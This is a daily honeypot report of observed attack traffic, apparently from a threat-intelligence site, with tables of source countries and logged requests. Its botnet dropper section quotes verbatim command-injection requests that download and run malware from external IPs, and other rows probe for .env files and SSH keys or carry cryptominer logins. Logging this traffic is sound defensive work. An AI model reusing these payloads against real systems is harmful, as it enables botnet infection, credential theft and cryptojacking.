Table of Contents

Daily Report: 2025-03-25
#

interaction report on http service of various Hhoneypot around the world.

OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai
FR	Dubai
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
185.40.4.51	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
188.124.135.200	GET /shell?cd+/tmp;rm+-rf+*;wget+http://188.124.135.200:55440/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
141.98.11.94	GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh HTTP/1.1
87.121.84.41	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
123.157.136.106	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
60.249.212.60	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.84.71.195/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
185.196.220.57	GET /shell?cd+/tmp;rm+-rf+x86;nohup+wget+http:/\x5C/87.121.84.145/bins/x86;chmod+777+x86;./x86;ulimit+-n+99999 HTTP/1.1
200.81.185.179	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
87.121.84.195	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
216	3	GET /.env-sample HTTP/1.1
399	1	GET /.ssh/id_ed25519 HTTP/1.1
412	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xc77c44e6124e2c41446efb056d8b1fff1075f979\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
425	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2242UB7PjfDvPAorC1rLCmsbNLeTs6TkcV7LfeqSgHTAnpGwY28SZR5rWAGpPFWh6bGzDF5hrz6ujZ8dTuSfMnJvG37MUsgzg\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
484	1	GET /app/frontend/.env HTTP/1.1
489	1	\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xC1y\xE8\xCE\xF3\xC6\xFA}\x05\x02\x00\x01\x00\x00\xA1\xAA
491	1	\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xBB\x22\xA2;\x13\xCA\xCB\xD0\x0F;A\x18\xDB\x07 \x8B\xB5\xA9\x91\xC5\xE7R\xDD\xF9)\xAD[Zc\xE2b0>rO\xDA\x81\x07\x11\x83\x81\xEF.h\xE8U\xCE\xF5)zD
494	1	OPTIONS rtsp://xxx.xxx.xxx.xxx:80 RTSP/1.0
499	1	GET /index/function.php HTTP/1.1
500	1	GET /about/function.php HTTP/1.1
501	1	GET /doc/function.php HTTP/1.1
502	1	GET /admin/function.php HTTP/1.1
503	1	GET /mah/function.php HTTP/1.1
504	1	GET /as/function HTTP/1.1
505	1	GET /file/function.php HTTP/1.1
506	1	GET /plugins/function.php HTTP/1.1
522	1	GET /.env.test.local HTTP/1.1
523	1	GET /.env.sample.php HTTP/1.1
528	1	GET /.c9/metadata/environment/.env HTTP/1.1
530	1	GET /tests/test-become/.env HTTP/1.1
532	1	\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xFE\xAA\xB0\xDEgW\xB44\x05\x02\x00\x01\x00\x00\xA1\xAA
534	1	\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xD5_\xA2\xFD\xF9\x14\xC5\xAD\x978\xD3\xC1y\xB6p\x06[\x1D?\xE1\xEB\xEAk\xBC/\x01\xC0!7c\x95\xB9\xCA\x97\xD9\xE9\xC1zS\xF2
542	1	\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x18\xF3\xCB\xC6\xAF\x92r\x09\x05\x02\x00\x01\x00\x00\xA1\xAA
593	1	GET /Odin/http/call1742784483 HTTP/1.1
594	1	GET /OdinHttpCall1742784483 HTTP/1.1
596	1	GET /odinhttpcall1742784483 HTTP/1.1
609	1	+/tmp/gpon80&ipv=0
611	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22479qGnmGQ8zB4bYJvMMh9AHWSattuqZ6aQjA7VxXVg1fPpyuSU9vyVZaqtyN2R3a35QbahnhR1421f8s61Csgim6GYxFTiZ\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
612	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xd06fb9619b7f4dd934258f9e1e3b3e4356dead5e\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
615	1	GET /3-sequelize/final/.env HTTP/1.1
616	1	GET /31_structure_tests/.env HTTP/1.1
644	1	GET /clld_dir/.env HTTP/1.1
645	1	GET /ClientApp/.env HTTP/1.1
646	1	GET /client/src/.env HTTP/1.1
668	1	GET /?uri=/var/www/html/config.js HTTP/1.1
679	1	GET /client/mutual-fund-app/.env HTTP/1.1
680	1	GET /client-app/.env HTTP/1.1
681	1	GET /acme_challenges/.env HTTP/1.1
682	1	GET /chiminey/.env HTTP/1.1
684	1	GET /Assignment4/.env HTTP/1.1
685	1	GET /Assignment3/.env HTTP/1.1
686	1	GET /assets/.env HTTP/1.1
687	1	GET /asset_img/.env HTTP/1.1
688	1	GET /Archipel/.env HTTP/1.1
689	1	GET /apps/client/.env HTTP/1.1
691	1	GET /app2-static/.env HTTP/1.1
692	1	GET /app1-static/.env HTTP/1.1
694	1	GET /app/config/dev/.env HTTP/1.1
697	1	GET /app/client/.env HTTP/1.1
698	1	GET /app-order-client/.env HTTP/1.1
699	1	GET /app_nginx_static_path/.env HTTP/1.1
700	1	GET /app_dir/.env HTTP/1.1
701	1	GET /api/src/.env HTTP/1.1
703	1	GET /anaconda/..env HTTP/1.1
705	1	GET /agora/.env HTTP/1.1
707	1	GET /adminer/.env HTTP/1.1
709	1	GET /actions-server/.env HTTP/1.1
710	1	GET /acme/.env HTTP/1.1
711	1	GET /acme-challenge/.env HTTP/1.1
713	1	GET /back-end/app/.env HTTP/1.1
716	1	GET /chat-client/.env HTTP/1.1
717	1	GET /charts/liveObjects/.env HTTP/1.1
718	1	GET /challenges/.env HTTP/1.1
719	1	GET /challenge/.env HTTP/1.1
721	1	GET /ch8b-mytodo/.env HTTP/1.1
722	1	GET /ch8a-mytodo/.env HTTP/1.1
723	1	GET /ch8-mytodo/.env HTTP/1.1
724	1	GET /ch7a-mytodo/.env HTTP/1.1
725	1	GET /ch7-mytodo/.env HTTP/1.1
726	1	GET /ch6a-mytodo/.env HTTP/1.1
727	1	GET /ch6-mytodo/.env HTTP/1.1
728	1	GET /ch2-mytodo/.env HTTP/1.1
729	1	GET /cdw-backend/.env HTTP/1.1
731	1	GET /cardea/backend/.env HTTP/1.1
732	1	GET /bucoffea/.env HTTP/1.1
733	1	GET /bootstrap/.env HTTP/1.1
734	1	GET /bookchain-client/.env HTTP/1.1
735	1	GET /blue/.env HTTP/1.1
737	1	GET /blob/.env HTTP/1.1
738	1	GET /blankon/.env HTTP/1.1
739	1	GET /bitcoind/.env HTTP/1.1
743	1	GET /backendfinaltest/.env HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	424	NL
1	384	BG
2	305	US
3	287	FR
4	215	GB
5	143	PL
6	110	DE
7	78	HK
8	60	TR
9	50	VN
10	45	KZ
11	45	CA
12	42	CH
13	28	CN
14	28	NO
15	26	LT
16	20	SC
17	16	NG
18	15	JP
19	14	ZA
20	14	AU
21	11	BE
22	10	RU
23	10	PT
24	10	UA
25	8	VE
26	7	BR
27	6	FI
28	6	SA
29	6	KR
30	5	AO
31	5	TH
32	5	AR
33	5	SG
34	4	ID
35	4	TW
36	3	IN
37	3	IR
38	3	GH
39	2	IT
40	2	AM
41	2	AZ
42	2	MA
43	1	SE
44	1	RO
45	1	MO
46	1	HU
47	1	AE
48	1	MN

Report: 2025-03-23

23 March 2025·2901 words

Repport Daily

Report: 2025-03-22

22 March 2025·4611 words

Repport Daily

Report: 2025-03-21

21 March 2025·7473 words

Repport Daily

Report: 2025-03-24

Daily Report: 2025-03-25
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

Related

	number_of_occurence	country_iso_code
0	424	NL
1	384	BG
2	305	US
3	287	FR
4	215	GB
5	143	PL
6	110	DE
7	78	HK
8	60	TR
9	50	VN
10	45	KZ
11	45	CA
12	42	CH
13	28	CN
14	28	NO
15	26	LT
16	20	SC
17	16	NG
18	15	JP
19	14	ZA
20	14	AU
21	11	BE
22	10	RU
23	10	PT
24	10	UA
25	8	VE
26	7	BR
27	6	FI
28	6	SA
29	6	KR
30	5	AO
31	5	TH
32	5	AR
33	5	SG
34	4	ID
35	4	TW
36	3	IN
37	3	IR
38	3	GH
39	2	IT
40	2	AM
41	2	AZ
42	2	MA
43	1	SE
44	1	RO
45	1	MO
46	1	HU
47	1	AE
48	1	MN

	number_of_occurence	country_iso_code
0	424	NL
1	384	BG
2	305	US
3	287	FR
4	215	GB
5	143	PL
6	110	DE
7	78	HK
8	60	TR
9	50	VN
10	45	KZ
11	45	CA
12	42	CH
13	28	CN
14	28	NO
15	26	LT
16	20	SC
17	16	NG
18	15	JP
19	14	ZA
20	14	AU
21	11	BE
22	10	RU
23	10	PT
24	10	UA
25	8	VE
26	7	BR
27	6	FI
28	6	SA
29	6	KR
30	5	AO
31	5	TH
32	5	AR
33	5	SG
34	4	ID
35	4	TW
36	3	IN
37	3	IR
38	3	GH
39	2	IT
40	2	AM
41	2	AZ
42	2	MA
43	1	SE
44	1	RO
45	1	MO
46	1	HU
47	1	AE
48	1	MN

Daily Report: 2025-03-25#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-03-25
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	424	NL
1	384	BG
2	305	US
3	287	FR
4	215	GB
5	143	PL
6	110	DE
7	78	HK
8	60	TR
9	50	VN
10	45	KZ
11	45	CA
12	42	CH
13	28	CN
14	28	NO
15	26	LT
16	20	SC
17	16	NG
18	15	JP
19	14	ZA
20	14	AU
21	11	BE
22	10	RU
23	10	PT
24	10	UA
25	8	VE
26	7	BR
27	6	FI
28	6	SA
29	6	KR
30	5	AO
31	5	TH
32	5	AR
33	5	SG
34	4	ID
35	4	TW
36	3	IN
37	3	IR
38	3	GH
39	2	IT
40	2	AM
41	2	AZ
42	2	MA
43	1	SE
44	1	RO
45	1	MO
46	1	HU
47	1	AE
48	1	MN